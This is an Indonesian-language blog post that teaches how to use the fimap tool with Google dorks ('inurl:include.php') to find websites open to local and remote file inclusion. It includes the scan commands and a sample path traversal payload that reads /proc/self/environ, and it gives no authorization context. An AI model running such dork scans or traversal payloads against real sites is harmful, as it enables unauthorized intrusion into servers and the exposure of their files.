Minggu, 03 Juni 2012

mencari bug website dengan FiMap

tapi tenang aja klo di linux backtrack tidak perlu install lagi karna sudah ada di dalamnya tools ini bernama FiMap.py

ngejalanin gampang sekali...


Code:
./fimap.py -h
klo bingung cara menggunakannya

Code:
./fimap.py -g -q 'dorknya'
Code:
./fimap -g -q 'inurl:include.php'
defaultnya yang ada di dalam fimap

dan jangn pernah kita tingga saat mencari bug LFI/RFI ini karna akan terus berjalan hingga page di dalam google sudah tidak ada website lagi pada dork tersebut.

dan apa bila berhasil akan keluar seperti
Code:
[INFO]www.xxxx.com/include.php?com=../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

berarti itu ada bug LFInya....
tutor ini untuk bug LFI dan RFInya tinggal di sesuai kan

Mohon Maaf Apa Bila Masih Ada Salah.
Masih Belajar.


Terima kasih

Tidak ada komentar:

Posting Komentar